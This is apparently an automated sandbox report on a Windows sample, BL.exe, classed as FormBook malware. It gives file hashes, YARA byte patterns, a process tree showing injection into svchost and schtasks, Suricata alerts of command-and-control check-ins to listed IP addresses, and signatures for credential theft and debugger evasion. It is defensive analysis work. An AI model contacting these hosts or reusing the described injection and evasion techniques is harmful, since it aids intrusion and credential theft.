Windows Analysis Report
BL.exe

Overview

General Information

Sample name: BL.exe
Analysis ID: 1538723
MD5: 0084fa11e77425fd332e10928312f760
SHA1: 33de149315ca65380f3f4f39ac3dcb85e36f588d
SHA256: 0d76a185c479321a6eb599b67de8126eb81d5e3f8a1b9d93c0abaeeef9c89e40
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • BL.exe (PID: 2308 cmdline: "C:\Users\user\Desktop\BL.exe" MD5: 0084FA11E77425FD332E10928312F760)
    • svchost.exe (PID: 2084 cmdline: "C:\Users\user\Desktop\BL.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • OmmtmfniIsg.exe (PID: 5196 cmdline: "C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • schtasks.exe (PID: 3796 cmdline: "C:\Windows\SysWOW64\schtasks.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
          • OmmtmfniIsg.exe (PID: 2656 cmdline: "C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5900 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.4642083493.0000000000430000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.4642083493.0000000000430000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2bd50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13fef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4645149295.0000000002960000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.4645149295.0000000002960000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2bd50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13fef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2374333248.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2ddf3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16092:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2ebf3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16e92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\BL.exe", CommandLine: "C:\Users\user\Desktop\BL.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BL.exe", ParentImage: C:\Users\user\Desktop\BL.exe, ParentProcessId: 2308, ParentProcessName: BL.exe, ProcessCommandLine: "C:\Users\user\Desktop\BL.exe", ProcessId: 2084, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\BL.exe", CommandLine: "C:\Users\user\Desktop\BL.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BL.exe", ParentImage: C:\Users\user\Desktop\BL.exe, ParentProcessId: 2308, ParentProcessName: BL.exe, ProcessCommandLine: "C:\Users\user\Desktop\BL.exe", ProcessId: 2084, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-21T17:24:45.946908+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49930 | 188.114.96.3 | 80 | TCP
2024-10-21T17:25:14.287533+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49994 | 52.13.151.179 | 80 | TCP
2024-10-21T17:25:36.374955+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50000 | 103.106.67.112 | 80 | TCP
2024-10-21T17:25:49.591455+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50004 | 188.114.96.3 | 80 | TCP
2024-10-21T17:26:04.855339+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50010 | 3.33.130.190 | 80 | TCP
2024-10-21T17:26:18.811054+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 57330 | 217.70.184.50 | 80 | TCP
2024-10-21T17:26:32.177100+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 57336 | 94.23.162.163 | 80 | TCP
2024-10-21T17:26:46.344977+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 57340 | 103.224.182.242 | 80 | TCP
2024-10-21T17:26:59.734375+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 57344 | 209.74.64.187 | 80 | TCP
2024-10-21T17:27:13.281250+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 57350 | 65.21.196.90 | 80 | TCP
2024-10-21T17:27:26.618719+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 57354 | 3.33.130.190 | 80 | TCP
2024-10-21T17:27:39.729473+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 57358 | 3.33.130.190 | 80 | TCP
2024-10-21T17:27:54.172058+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 57362 | 8.210.49.139 | 80 | TCP
2024-10-21T17:28:07.631770+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 57368 | 94.23.162.163 | 80 | TCP
2024-10-21T17:28:25.263211+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 57369 | 188.114.96.3 | 80 | TCP
2024-10-21T17:28:38.488784+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 57373 | 52.13.151.179 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-21T17:25:06.652560+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49988 | 52.13.151.179 | 80 | TCP
2024-10-21T17:25:09.193625+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49992 | 52.13.151.179 | 80 | TCP
2024-10-21T17:25:11.755140+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49993 | 52.13.151.179 | 80 | TCP
2024-10-21T17:25:28.750060+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49995 | 103.106.67.112 | 80 | TCP
2024-10-21T17:25:31.062664+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49998 | 103.106.67.112 | 80 | TCP
2024-10-21T17:25:33.625032+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49999 | 103.106.67.112 | 80 | TCP
2024-10-21T17:25:41.936045+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50001 | 188.114.96.3 | 80 | TCP
2024-10-21T17:25:44.510712+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50002 | 188.114.96.3 | 80 | TCP
2024-10-21T17:25:47.065312+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50003 | 188.114.96.3 | 80 | TCP
2024-10-21T17:25:55.058197+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50005 | 3.33.130.190 | 80 | TCP
2024-10-21T17:25:57.616175+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50008 | 3.33.130.190 | 80 | TCP
2024-10-21T17:26:01.277397+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50009 | 3.33.130.190 | 80 | TCP
2024-10-21T17:26:11.219341+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57327 | 217.70.184.50 | 80 | TCP
2024-10-21T17:26:13.751070+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57328 | 217.70.184.50 | 80 | TCP
2024-10-21T17:26:16.328131+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57329 | 217.70.184.50 | 80 | TCP
2024-10-21T17:26:24.623720+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57333 | 94.23.162.163 | 80 | TCP
2024-10-21T17:26:27.162255+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57334 | 94.23.162.163 | 80 | TCP
2024-10-21T17:26:29.632875+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57335 | 94.23.162.163 | 80 | TCP
2024-10-21T17:26:38.750093+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57337 | 103.224.182.242 | 80 | TCP
2024-10-21T17:26:41.296892+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57338 | 103.224.182.242 | 80 | TCP
2024-10-21T17:26:43.843746+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57339 | 103.224.182.242 | 80 | TCP
2024-10-21T17:26:52.063051+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57341 | 209.74.64.187 | 80 | TCP
2024-10-21T17:26:54.627112+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57342 | 209.74.64.187 | 80 | TCP
2024-10-21T17:26:57.203134+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57343 | 209.74.64.187 | 80 | TCP
2024-10-21T17:27:05.640620+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57347 | 65.21.196.90 | 80 | TCP
2024-10-21T17:27:08.187589+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57348 | 65.21.196.90 | 80 | TCP
2024-10-21T17:27:10.688114+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57349 | 65.21.196.90 | 80 | TCP
2024-10-21T17:27:19.884813+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57351 | 3.33.130.190 | 80 | TCP
2024-10-21T17:27:21.496502+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57352 | 3.33.130.190 | 80 | TCP
2024-10-21T17:27:24.048800+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57353 | 3.33.130.190 | 80 | TCP
2024-10-21T17:27:33.029167+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57355 | 3.33.130.190 | 80 | TCP
2024-10-21T17:27:34.636976+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57356 | 3.33.130.190 | 80 | TCP
2024-10-21T17:27:37.183225+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57357 | 3.33.130.190 | 80 | TCP
2024-10-21T17:27:46.501070+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57359 | 8.210.49.139 | 80 | TCP
2024-10-21T17:27:49.030879+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57360 | 8.210.49.139 | 80 | TCP
2024-10-21T17:27:51.575501+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57361 | 8.210.49.139 | 80 | TCP
2024-10-21T17:28:00.061996+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57363 | 94.23.162.163 | 80 | TCP
2024-10-21T17:28:02.600944+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57366 | 94.23.162.163 | 80 | TCP
2024-10-21T17:28:05.080540+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57367 | 94.23.162.163 | 80 | TCP
2024-10-21T17:28:30.849501+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57370 | 52.13.151.179 | 80 | TCP
2024-10-21T17:28:33.397854+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57371 | 52.13.151.179 | 80 | TCP
2024-10-21T17:28:35.945799+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57372 | 52.13.151.179 | 80 | TCP
2024-10-21T17:28:52.296977+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57374 | 103.106.67.112 | 80 | TCP
2024-10-21T17:28:54.859422+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 57375 | 103.106.67.112 | 80 | TCP


AV Detection

Source: BL.exe; ReversingLabs: Detection: 21%
Source: Yara match; File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000004.00000002.4642083493.0000000000430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.4645149295.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2374333248.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.4645447566.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.4645860637.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.4649388492.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2374622096.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2374964402.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: BL.exe; Joe Sandbox ML: detected
Source: BL.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: schtasks.pdb source: svchost.exe, 00000002.00000003.2343149641.0000000002E49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339549263.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000003.2308910777.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000003.2308910777.000000000088B000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000002.4643317474.00000000008B8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OmmtmfniIsg.exe, 00000003.00000000.2294008987.000000000048E000.00000002.00000001.01000000.00000004.sdmp, OmmtmfniIsg.exe, 00000006.00000000.2452423712.000000000048E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: BL.exe, 00000000.00000003.2200803339.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, BL.exe, 00000000.00000003.2201628438.0000000004630000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2278099897.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2276121714.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2374651538.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2374651538.000000000359E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4646369641.0000000002E5E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4646369641.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2381659246.000000000296E000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2383829839.0000000002B14000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: BL.exe, 00000000.00000003.2200803339.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, BL.exe, 00000000.00000003.2201628438.0000000004630000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2278099897.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2276121714.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2374651538.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2374651538.000000000359E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, schtasks.exe, 00000004.00000002.4646369641.0000000002E5E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4646369641.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2381659246.000000000296E000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2383829839.0000000002B14000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: schtasks.exe, 00000004.00000002.4648172740.00000000032EC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4642699238.00000000026E3000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000006.00000002.4645986744.00000000026CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2711959587.000000000FE0C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: schtasks.pdbGCTL source: svchost.exe, 00000002.00000003.2343149641.0000000002E49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339549263.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000003.2308910777.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000003.2308910777.000000000088B000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000002.4643317474.00000000008B8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: schtasks.exe, 00000004.00000002.4648172740.00000000032EC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4642699238.00000000026E3000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000006.00000002.4645986744.00000000026CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2711959587.000000000FE0C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\BL.exe; Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452126
Source: C:\Users\user\Desktop\BL.exe; Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose, 0_2_0045C999
Source: C:\Users\user\Desktop\BL.exe; Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00436ADE
Source: C:\Users\user\Desktop\BL.exe; Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00434BEE
Source: C:\Users\user\Desktop\BL.exe; Code function: 0_2_0045DD7C FindFirstFileW,FindClose, 0_2_0045DD7C
Source: C:\Users\user\Desktop\BL.exe; Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD29
Source: C:\Users\user\Desktop\BL.exe; Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle, 0_2_00436D2D
Source: C:\Users\user\Desktop\BL.exe; Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442E1F
Source: C:\Users\user\Desktop\BL.exe; Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00475FE5
Source: C:\Users\user\Desktop\BL.exe; Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8D
Source: C:\Windows\SysWOW64\schtasks.exe; Code function: 4_2_0044C310 FindFirstFileW,FindNextFileW,FindClose, 4_2_0044C310
Source: C:\Windows\SysWOW64\schtasks.exe; Code function: 4x nop then xor eax, eax 4_2_00439B90
Source: C:\Windows\SysWOW64\schtasks.exe; Code function: 4x nop then mov ebx, 00000004h 4_2_02AB04E1

Networking

Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49930 -> 188.114.96.3:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49999 -> 103.106.67.112:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49992 -> 52.13.151.179:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50000 -> 103.106.67.112:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49988 -> 52.13.151.179:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49995 -> 103.106.67.112:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57329 -> 217.70.184.50:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57328 -> 217.70.184.50:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49994 -> 52.13.151.179:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49998 -> 103.106.67.112:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57341 -> 209.74.64.187:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49993 -> 52.13.151.179:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50010 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50004 -> 188.114.96.3:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50003 -> 188.114.96.3:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50008 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50002 -> 188.114.96.3:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57337 -> 103.224.182.242:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57334 -> 94.23.162.163:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57373 -> 52.13.151.179:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57367 -> 94.23.162.163:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50005 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57338 -> 103.224.182.242:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57366 -> 94.23.162.163:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57358 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57333 -> 94.23.162.163:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57347 -> 65.21.196.90:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57361 -> 8.210.49.139:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57342 -> 209.74.64.187:80
